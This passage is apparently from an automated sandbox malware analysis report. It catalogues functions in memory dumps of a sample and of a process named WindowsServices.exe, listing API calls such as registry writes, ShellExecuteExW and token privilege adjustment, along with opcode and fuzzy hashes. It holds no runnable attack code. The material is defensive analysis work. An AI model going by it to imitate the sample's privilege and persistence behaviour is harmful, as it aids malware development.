Instruction Fuzzy Hash: 9421B0716042049FF720DF65CD45BA6FBE8EF25324F048869E9448B782D775E909CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00AAB0E2 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAB161

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 23e4c334eab4a960187760deea3435fbd76131a8fbc82758544dc22fd147427e
Instruction ID: 12bd456f7faa7b4bb3ce0d91326b56fee47b9ed2eff1a3c76baba9e4af48fcd0
Opcode Fuzzy Hash: 23e4c334eab4a960187760deea3435fbd76131a8fbc82758544dc22fd147427e
Instruction Fuzzy Hash: 2021B071509384AFD7228F51CC44F96BFB8EF55210F08889AE9458B552C325A908CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA392 Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA40C

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 701a4e90d25d108bcb9aaa0377947aca6ad65958d20b69c83dff86fdcccd1ef6
Instruction ID: 3f960761df73100579171d007f647342d2591b31db90e8c2f1eba54acff64cac
Opcode Fuzzy Hash: 701a4e90d25d108bcb9aaa0377947aca6ad65958d20b69c83dff86fdcccd1ef6
Instruction Fuzzy Hash: 78219075600204AFEB20CF55CC85FA6F7ECEF29710F04846AE946CB691D764E809CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA960 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00AAA9CC

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d3c9aae4e126b101343df5cc91126d2b6835a86c10332d4a54366812e2b4f67b
Instruction ID: 7a43377402235e8a06654251a8fdfec2a7448c54a973ccb7af6e6c174055ec27
Opcode Fuzzy Hash: d3c9aae4e126b101343df5cc91126d2b6835a86c10332d4a54366812e2b4f67b
Instruction Fuzzy Hash: 7921C0725093C05FDB128B25DD54B92BFF4AF17324F0984DAE8858F6A3D274A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA486 Relevance: 1.6, APIs: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA4F8

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: c9eb7812c2912b266317461168635c3ad0845bcd65be6bb9935f8b2731837292
Instruction ID: a02b4c20fc7ed7955ece106d9d19afb61ce93b35618fef18cf720e8021486c05
Opcode Fuzzy Hash: c9eb7812c2912b266317461168635c3ad0845bcd65be6bb9935f8b2731837292
Instruction Fuzzy Hash: 3F11B4755002049FE7218F15CC45F67FBECEF25714F04845AED458BA81D770E808CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA2D2 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 00AAA330

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: ec34bc9c7219b2632e4965cdc37537d649ca7ac10ebf5d39b31cab2b9e4fc62b
Instruction ID: ae049bd9c8ce2558966812166a8b5401f93af144c1dd1a4b21414105bd304475
Opcode Fuzzy Hash: ec34bc9c7219b2632e4965cdc37537d649ca7ac10ebf5d39b31cab2b9e4fc62b
Instruction Fuzzy Hash: 36212C7540E3C05FDB138B25DC54A52BFB49F17224F0980DBDD858F2A3C269A809DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAB102 Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAB161

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: aa3ffd89626b7ee76ec11dfd5123d14df70220bfbed2604fd5688add97531c9a
Instruction ID: 853b4034d391a7da91c6772edf9ff4b8ae3e5cf6d077bd829861f89a6349a1e2
Opcode Fuzzy Hash: aa3ffd89626b7ee76ec11dfd5123d14df70220bfbed2604fd5688add97531c9a
Instruction Fuzzy Hash: A011E372500204AFEB21CF55DC85FA6FBF8EF55324F04896AE9458BA92C375E508CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00AAB304 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00AAB360

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 6db634de07f4eff00664b72759baabdbab59b761a0a74784245222f2335f1148
Instruction ID: 0b395d5497bb724d201ef7752f41221eb49d22b6376dc13304fdb7ba589bd6fb
Opcode Fuzzy Hash: 6db634de07f4eff00664b72759baabdbab59b761a0a74784245222f2335f1148
Instruction Fuzzy Hash: F9115E715093809FDB12CB25DD94B56BFA89F46220F0884AAED45CF693D265A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA6AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00AAA6F6

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 25ebf235224028f2d352c89e75ef0e5a6c27e57a76b9797621cad8f96e038ea2
Instruction ID: d1c445e21bb94bb443e284f00eaa421dfe1bac201e4cfc7eeec5ae90dccb1401
Opcode Fuzzy Hash: 25ebf235224028f2d352c89e75ef0e5a6c27e57a76b9797621cad8f96e038ea2
Instruction Fuzzy Hash: A21165756002408FDB20CF59D845766FBE8EF15320F08846ADD45DB792D774E844CE72

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAF72 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAAFC5

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: cdf3674830f936ac7a3fd5b1363389b39574c7cc201740036abc2aa4677e4778
Instruction ID: 1236c79bc4375b7d4198bdef497f0e4645f480a94241669d445f0dd365b7a2d8
Opcode Fuzzy Hash: cdf3674830f936ac7a3fd5b1363389b39574c7cc201740036abc2aa4677e4778
Instruction Fuzzy Hash: E401D675504344AEE720CB05DC85BAAF7E8DF65724F14C066ED058B782D778E848CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAB326 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00AAB360

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: ba8d6373322d713858919fa816f14d2d4652ab8847b3139c97ce51326f1d3f4e
Instruction ID: eb51ca19b0138e3d68c92c67b5c1c2db27e58ea98dfce46c9b4563845564d9d5
Opcode Fuzzy Hash: ba8d6373322d713858919fa816f14d2d4652ab8847b3139c97ce51326f1d3f4e
Instruction Fuzzy Hash: 06018C71600240CFDB10CF6AD9847A6BBE8EF05320F08C4AADD09CFA82D775E808CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA99A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00AAA9CC

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ffd0a581d5e2331eab81ea0e0d59f2760cd707b4f380c501f0df6b3ddeddada1
Instruction ID: 598e49fc173acdd5b70f3ea8eb91ee27aa33df0d15e7889e5044229a17b1d128
Opcode Fuzzy Hash: ffd0a581d5e2331eab81ea0e0d59f2760cd707b4f380c501f0df6b3ddeddada1
Instruction Fuzzy Hash: 3701DF716006408FDB20CF59D984762FBE4EF15324F08C4AADD498BA86C374E808CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA2FE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00AAA330

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2610ec8d7b95643788bb2af7bb91cd2c604f0c6280c6b1223f28ab04844452a2
Instruction ID: 2293a05aa3e33872b558c6badc3d8ac50f073e5260453da15d516f21897ea022
Opcode Fuzzy Hash: 2610ec8d7b95643788bb2af7bb91cd2c604f0c6280c6b1223f28ab04844452a2
Instruction Fuzzy Hash: 1DF0AF39904640CFDB208F09D988765FBE0EF15324F08C0AADD494F792D379A808CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00E60278 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2d89800c70df923e6696abc56171dfa66d8f9ac4b0016067d28e5a62557e17
Instruction ID: 3e10c4719255b902d758fbe8952b1e479a6d77615fada026674cc9b23e578368
Opcode Fuzzy Hash: cb2d89800c70df923e6696abc56171dfa66d8f9ac4b0016067d28e5a62557e17
Instruction Fuzzy Hash: 2CB15B30901218CFDB24EFB8D954B9DBBB2EF45309F1044A9D449AB3A1DB399E85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E60268 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15b20ceeb693520e3595da515dae1464482bf929c26d7572bf475552938e0ea
Instruction ID: 3fac16fce226aa9012e488228d4b008950eae6495dbdd031b956823b7cec3e37
Opcode Fuzzy Hash: b15b20ceeb693520e3595da515dae1464482bf929c26d7572bf475552938e0ea
Instruction Fuzzy Hash: DE816F30901214CFDB24EF79D944BEDB7B2AF45309F1045A9D409AB3A1DB395E86CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00E60392 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb6395e8c3e826a96ffbd7ef522beb520a81ddb62cc77faecdb674e6e53656d
Instruction ID: a233c6e846cde2e43fd4b4fe4a754a550473abd62875bcde798104e91cd0e759
Opcode Fuzzy Hash: adb6395e8c3e826a96ffbd7ef522beb520a81ddb62cc77faecdb674e6e53656d
Instruction Fuzzy Hash: DC613E30A41218CFDB24EFB8D944BEDB7B2EF44308F1045A9D009AB6A5DB795E85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E60429 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f06821553ee4ef0fea85ea2ffecdd1c5202ba04db5290a67fd3b8a9c8279256
Instruction ID: a568923190e2a2a37e222886672a7a276dfece00c198b1b2fe7b963ddd668ada
Opcode Fuzzy Hash: 7f06821553ee4ef0fea85ea2ffecdd1c5202ba04db5290a67fd3b8a9c8279256
Instruction Fuzzy Hash: B6515030A412188FDB64EF78D940BDDB7B2EF44308F5044A9D009AB795DB395E85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E60080 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2948cccb817822b8bb0ed536c7c032a7cd7d638a8cfcb4004254284634f2c37
Instruction ID: 5dc78c7b56aea5f60124a6d10499c1a00de18d220d7531fcec55fac31913edd1
Opcode Fuzzy Hash: e2948cccb817822b8bb0ed536c7c032a7cd7d638a8cfcb4004254284634f2c37
Instruction Fuzzy Hash: C44121302152418BC724FF7DE68598977B2EF9524C740893DD4088FB6EEB78594BCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E60C10 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea9eb176d6ea92988cd64f1b317023cc72830a652e4091d9fc05119f3d37125
Instruction ID: 4febfc0501283509fb0addcde71de56e207af0919b53859d3f6e8d282a0c477c
Opcode Fuzzy Hash: fea9eb176d6ea92988cd64f1b317023cc72830a652e4091d9fc05119f3d37125
Instruction Fuzzy Hash: AC019230A093C04FD316677958218AA7FA58BC721570548BED481DB397CAAD5C4BC762

Uniqueness

Uniqueness Score: -1.00%

Function 00E60006 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f959205963df5f58ccd3e7fe76ab87da37776efdbeb7860ec7c10f57f043e74
Instruction ID: ef6741ea79b3ebf8cc983c67d8f59e75692219a05b274bbf442ae1f6980b2c83
Opcode Fuzzy Hash: 1f959205963df5f58ccd3e7fe76ab87da37776efdbeb7860ec7c10f57f043e74
Instruction Fuzzy Hash: 4A01ED6584FBD15FE30397B548690A0BFB1AD4762835A86CBC4C4CF0B3E209495EDBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00E505DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699616104.0000000000E50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e50000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3044e8f75666e9ce7a2bb706e2346a3bdcad7742e08b2340780630c3f7a04797
Instruction ID: 2373119d34179ced9b47fe432f42ca733faf09e282b2d8ad192f31aaf1b754f2
Opcode Fuzzy Hash: 3044e8f75666e9ce7a2bb706e2346a3bdcad7742e08b2340780630c3f7a04797
Instruction Fuzzy Hash: EB01A9B65093806FD7128B16AD40862FFF8DF8662070DC4AFEC498B712D235B909C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00E50606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699616104.0000000000E50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e50000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cc6181911cebd5e29d5a6cd3f107561165dc1ca78263a6d50099ab41f7350f
Instruction ID: 43e8d3273040850b56371ccf6e7f979ec66f2388d39af81a452e2bf7c8d4bba1
Opcode Fuzzy Hash: d0cc6181911cebd5e29d5a6cd3f107561165dc1ca78263a6d50099ab41f7350f
Instruction Fuzzy Hash: E0E092B66006404B9750DF0AED41452F7D8EB88630708C47FDC0D8BB02D235B509CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00AA23F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1698925762.0000000000AA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aa2000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60d8472d52560b633bd3f5b17a862095f6e67186cd3c4952fcfd4d77cc1604d
Instruction ID: 897a8f82ce7b31100a0dc2b1808db4e2395b1cac0c8b62d97f44e49f9e48240d
Opcode Fuzzy Hash: d60d8472d52560b633bd3f5b17a862095f6e67186cd3c4952fcfd4d77cc1604d
Instruction Fuzzy Hash: 0CD02E392407C04FD3268B0CC2A4B8537D4AB46704F0A04F9A800CB7A3C728E8C0C300

Uniqueness

Uniqueness Score: -1.00%

Function 00AA23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1698925762.0000000000AA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aa2000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a93ee25a8a3050849ceb71ba2531382f42d1f5e5621d70704357fc1a63d6d7f
Instruction ID: 86fc056c721b5e4727149dd325cf4e8daa5529a880fcb395c188d186398e4c44
Opcode Fuzzy Hash: 2a93ee25a8a3050849ceb71ba2531382f42d1f5e5621d70704357fc1a63d6d7f
Instruction Fuzzy Hash: 5ED05E342002814BDB25DB0CC2D4F5937D4AB42714F0648E9AC108F7A2C7A8E8D0DB10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WindowsServices.exePID: 6516, Parent PID: 3484COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	35
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00CBA893 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00CBA913

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 3c7d63defa5dcb4a93f5fc4336ff7329f729a5a012e35c7005d795fb62a569d0
Instruction ID: 22758a9f68b773d290a8a5837f6f4b166652823187daab45c98061c2ad3db4fc
Opcode Fuzzy Hash: 3c7d63defa5dcb4a93f5fc4336ff7329f729a5a012e35c7005d795fb62a569d0
Instruction Fuzzy Hash: 0421E2765097809FEB228F25DC40B92BFF4EF06310F0984DAE9858F563D271E908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAA15 Relevance: 1.6, APIs: 1, Instructions: 57
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00CBAA81

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 2c827237cbd280006566daa58cec9292f2d7680931405f16fb93bdf8f42f69a1
Instruction ID: d3a36f788a1443a49e37aaca27314dcf27f373dd2f442a190f2addc096e13cd0
Opcode Fuzzy Hash: 2c827237cbd280006566daa58cec9292f2d7680931405f16fb93bdf8f42f69a1
Instruction Fuzzy Hash: 6411BE714093809FDB228F20DC44A92FFB4EF06310F0980DAE9844B163D275A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA8CA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00CBA913

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 8ae562a236a269a5678609663950bc8505437248793c34056ac4bc196ebaf846
Instruction ID: b1c901b38a5277d9992f0342cda3659ab34f7abebb5669228c387eaa998b49b6
Opcode Fuzzy Hash: 8ae562a236a269a5678609663950bc8505437248793c34056ac4bc196ebaf846
Instruction Fuzzy Hash: 0E11C6729007009FDB20CF15D844B96FBE4EF04320F08C4AAED858B655D335E518DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAA46 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00CBAA81

Memory Dump Source

Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 5be03a6b76f1105f984b26429e9321a76660f62db60f4b30cc30f3f84d0f3c48
Instruction ID: aed5b48b6a754f59ef001eaed5b6a9d928e6dc20243fea313a9fd8a940095f15
Opcode Fuzzy Hash: 5be03a6b76f1105f984b26429e9321a76660f62db60f4b30cc30f3f84d0f3c48
Instruction Fuzzy Hash: 6D018F368006009FDB208F16D944BA1FBE4EF19720F08C09AED891B651D375E418EF72

Uniqueness

Uniqueness Score: -1.00%

Function 04E70278 Relevance: 4.0, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2l, xrefs: 04E70548
2l, xrefs: 04E705D8
a, xrefs: 04E70584

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID: 2l$2l$a
API String ID: 0-1664682057
Opcode ID: e1d6a1423430ef64ddb61d61d170ceeae9849d4c4b154321818304c8b5d91bcf
Instruction ID: c12877491600051e983642b3a0ace2ad58d7b3b88a3eff88c4a81a8ad4566059
Opcode Fuzzy Hash: e1d6a1423430ef64ddb61d61d170ceeae9849d4c4b154321818304c8b5d91bcf
Instruction Fuzzy Hash: 96B16C70A01218CFDB14EF75D854BEDB7B2AF85304F1084A9D409AB3A5DB35AE8ACF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E70268 Relevance: 3.9, Strings: 3, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2l, xrefs: 04E70548
2l, xrefs: 04E705D8
a, xrefs: 04E70584

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID: 2l$2l$a
API String ID: 0-1664682057
Opcode ID: 04d611488b52f31efcc5efe0c0be8e0786a3c7d4e01c2ed53a01d10f0aec2dbf
Instruction ID: 1ef2b1e483cd8fc74c781bed57758ad1fc3637fc0394c4ae0f26fa0b20d4581d
Opcode Fuzzy Hash: 04d611488b52f31efcc5efe0c0be8e0786a3c7d4e01c2ed53a01d10f0aec2dbf
Instruction Fuzzy Hash: 5B817D70A01218CFDB24EF75D855BEDB7B1AF84304F1084AAD409A73A5DB359E89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E70392 Relevance: 3.9, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2l, xrefs: 04E70548
2l, xrefs: 04E705D8
a, xrefs: 04E70584

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID: 2l$2l$a
API String ID: 0-1664682057
Opcode ID: ecfe5a1382cb2416f3f886aa3207900776cc02c21e783834568887fafde7d3cb
Instruction ID: 2ce32e159197cfad0f6695cc6f7295fbe0d335855b9886c2f43f4edd579ec5fb
Opcode Fuzzy Hash: ecfe5a1382cb2416f3f886aa3207900776cc02c21e783834568887fafde7d3cb
Instruction Fuzzy Hash: 11617E70A01219CFDB14EF75D951BECB7B2AF84308F1084A9D409AB3A1DB35AE85DF61

Uniqueness

Uniqueness Score: -1.00%

Function 04E70429 Relevance: 3.9, Strings: 3, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2l, xrefs: 04E70548
2l, xrefs: 04E705D8
a, xrefs: 04E70584

Memory Dump Source

Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd

Similarity

API ID:
String ID: 2l$2l$a
API String ID: 0-1664682057
Opcode ID: b63a637a9fbfae831aa2d74e583afcaa24bd98739bd23e32beb9f810a025decb
Instruction ID: a60bb092dffe18d38d94f7b3c84dc879f2656abd3552ce10c14dc43a295e42ed
